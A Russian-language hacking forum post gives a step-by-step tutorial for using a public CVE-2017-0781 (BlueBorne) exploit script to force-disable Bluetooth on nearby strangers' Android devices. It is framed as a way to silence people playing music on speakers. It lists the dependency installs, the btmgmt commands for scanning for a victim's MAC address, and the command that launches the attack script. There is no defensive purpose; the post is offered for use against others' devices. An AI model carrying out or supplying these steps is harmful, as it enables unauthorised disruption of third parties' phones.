Обрубаем любителей face-а на колонках или как отключить Bluetooth на чужом девайсе.

  • Автор темы root4
  • Дата начала
R

root4

Original poster
Доброго времени суток. Опять пишу всякие "хацкерские" темы в ночное время суток( по МСК). Ладно, не суть. Сегодня хотел бы рассказать вам об уязвимости, которая известно давно...Просто о ней на время забыли, т.к. не выкладывали exploit...И вот на днях совершилось чудо! На гитхабе выложили скрипт python-а с использованием уязвимости(CVE-2017-0781/ Blueborn).
Суть exploit-а в том, что бы вызвать принуждённое отключение bluetooth на устройстве "жертвы". Грубо говоря, exploit бьёт по уязвимым местам прошивки android( как пишут некоторые люди, ios тоже через раз получается) и вызывает ошибку типа null-byte(переполнение буфера).

UPD: Было лично протестировано на своём телефоне - MEIZU M5 NOTE с обновлённым Flyme OS.

Приступим!

>Первым делом нам нужно установить зависимости скрипта.
Код:
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
Затем обновляем модули python.
Код:
pip install --upgrade pip
pip install --upgrade pwntools
Для работы с bluetooth с помощью python нам понадобится модуль pybluez.
Код:
apt-get install bluetooth libbluetooth-dev
pip install pybluez
>Затем приступаем к скачиванию эксплоита(корректней будет назвать скриптом).
Код:
git clone

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


>Дальше нам придётся попотеть...Т.к. проблема может быть следующая:
Не работает bluetooth....Для этого используем утиллиту btmgmt.
Запускаем её и делаем следующие шаги:
Код:
btmgmt --index 0
power
auto-power
find
Если начнется мониторинг Bluetooth устройств - значит всё готово.
>Используем скрипт. Для этого нам нужен MAC-адресс bluetooth устройства(используем команду btmgmt --index 0 и find).
Как только нашли "жертву", вводим команду.
Код:
python CVE-2017-0781.py TARGET=*mac-адресс с заглавными буквами.*
И ждём. Мониторить устройство можете с других или же через консоль.